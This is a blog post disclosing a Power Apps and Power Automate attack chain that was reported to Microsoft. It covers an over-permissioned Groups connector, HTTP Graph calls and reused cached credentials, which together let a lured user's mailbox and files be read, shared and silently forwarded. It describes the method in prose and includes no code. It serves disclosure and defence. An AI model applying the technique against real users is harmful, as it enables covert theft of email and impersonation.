Callout, this blog was written a while ago but after raising one of the issues below in the Microsoft Security Response Center I was asked to wait until they had rolled out a fix.
You may have seen a new tenant feature to blog manual resubmits, yep that's the fix, and yes its my fault, sorry.
mslearn-resubmit-flow-runs-initiated-by-instant-triggers
So if anything is a little out of date, you now know why 😎
One day you get a message about testing a new app, it could be from one of our team, a colleague or even a generic reach out for help email. They are all internal emails, and it's just a Power App so what harm can it do.
You open it, it requests to use Office 365 Groups, it makes sense for the app. There is also no list of permissions but as you have no group rights it doesn't worry you.
The app opens then errors, you send an email back letting them know it isn't work and forget all about it.
The problem is you have just handed your Office 365 keys to a hacker.
I've spoken about risks of Power App hacking before here, but if that one was a villain, this new app would be a super villain. See not only do I have access to everything (not just Office 365 Groups), I can run nearly any action, at will, for ever. I can even spy on your emails with zero effort for eternity.
Want to know how, let me show you.
First although our Super Villain is powerful, its real power comes from its side kick Power Automate. This Super Villain Duo has 3 super powers:
- Unlocked Graph API
- HTTP Graph API Power
- Cached Credentials
The app is really simple, a one screen Power App that calls a flow, the flow uses the Office 365 Groups connector, with the credentials Provided by run-only user. The App is in an environment where the developer has full access e.g. Default.
1. Unlocked Graph API
The Office 365 Groups Connector should give you access to just the groups Graph API endpoints, but when released there must have been an error, as nearly all endpoints were approved.
So this means even though the user only approves this one connector, they have in fact approved access to:
- Outlook
- OneDrive
- Teams
- SharePoint
- Planner
- OneNote and more
So the Super Villain App with its side kick can now in theory do whatever it wants and you wouldn't even know it had access.
Some scary examples are:
Send Email as the user
We have the power to send any email to anyone and it will appear as if the user sent the email (great for approving things).
We can even set not to show in the users Outlook sent folder
Edit OneDrive Files
We are able to list all your OneDrive (or in below example most recently edited) and then share them with us. We are now able to not only read them, but edit them.
Read Calendar
All of the user's meetings can be viewed, including notes/agenda's
Read Emails
Any email in any folder can be read/downloaded.
Search
We can even search all of the user's emails and files for keywords
And just for mischievousness we could:
Create/Cancel Meetings
Full video: https://youtu.be/BqYLgV_iOYQ
But Microsoft has released a version 2 of the connector and removed the version 1 from the connector list. But you can still run existing and copy over to new flows
2. HTTP Graph API Power
I love the power of the HTTP connectors, I even wrote a blog about it here, but with great power comes great responsibility. Because we have unlocked the Graph API our Super Villain now has a lot more power beyond normal connectors. A particularly dangerous one is the Outlook rules API. This allows us to set rules on your mailbox. We could delete, move, forward (or all 3), in fact we can do a lot with this one API.
| Property | Type | Values |
|---|---|---|
| assignCategories | String collection | Array of categories |
| copyToFolder | String | Folder ID |
| delete | Boolean | true |
| forwardAsAttachmentTo | recipient collection | Array of email addresses |
| forwardTo | recipient collection | Array of email addresses |
| markAsRead | Boolean | true, false |
| markImportance | importance | low, normal, high. |
| moveToFolder | String | Folder ID |
| permanentDelete | Boolean | true (Desktop client only) |
| redirectTo | recipient collection | Array of email addresses |
| stopProcessingRules | Boolean | true, false |
Full details at learn.microsoft
So when you logged into the Super Villain App you called a flow that had one action, the Group 365 HTTP Connector (please note if this connector has been fixed you can still use the Outlook HTTP Connector, the user would just know you have access).
The end result is the rule setup on your server side. So every email is forwarded to any mailbox you want, even if they never open Outlook desktop.
Check out below, here we see a confidential email sent and then forwarded on.
Full video: https://youtu.be/r_9ADbRREXk
3. Cached Credentials
At least with the above vulnerabilities the attack has to be pre-planned and can only be launched every time the user opens the app. Well no, and that's because Power Automate caches the users credentials and allows the owner to resubmit the flow.
This means that one log into the app, means you have given access indefinitely. All the Super Villain has to do is edit the flow, then press the test button. The users credentials are reused but they never know. This means what ever connectors were used by the app user can not be used by the flow owner, even different actions then originally in the flow.
With these exploits used in tandem the Super Villain has full access. Even if the Office 365 Group HTTP connector is removed (as Microsoft has started to), all we are doing is removing the master key, not the keys. So all the Villain would have to do is include each connection (how easy would it be to add a plausible reason for Outlook, OneDrive etc).
So who is our SuperHero to our Super Villain, that can only be Microsoft. They need to
- Block Office 365 Group HTTP v1
- Enforce DLP on HTTP connectors like custom connectors (block specific URLs)
- List what actual rights the app uses (e.g. not 'Outlook' but 'Reads Emails')
- Show flows called by the app
- Notify user if run resubmitted with 'Provided by run-only user' or block resubmits if using run only users credentials
We see how talented the Dev team is with all the amazing updates they keep rolling out so we know they can do it. But without these users need to be very wary of using Apps from untrusted sources. Platform admins should push as much from Default to controlled environments with change management.
Full Demo Video: https://youtu.be/qTwFlmoCNZ4
Back to today, as you can see Microsoft have been busy. Granular detail on what permissions the app is using with the connection is out (the more important Flow part is in progress). HTTP actions are still a risk, especially as they don't have connector controls like standard HTTP action. As for the cached credentials, the fix is in my opinion a little overkill. The significant impact to peoples workflows means most are turning it off, I hope a future update limits it to specific environments (cough, the Default), or just when using someone else's connections.
I've had a few requests for a mailing list to alert new blogs, if you would like to get notified every time I release a blog (I also do a few in the Power Platform Community), subscribe below
Subscribe to David Wyatts Blogs
powerdevbox.com
You will be pleased to know I built the mailing system myself in Power Automate, so if it doesn't work you know why 😎
Top comments (1)
Graph api has so much powerful capabilitites. Have to explore a bit more on this topic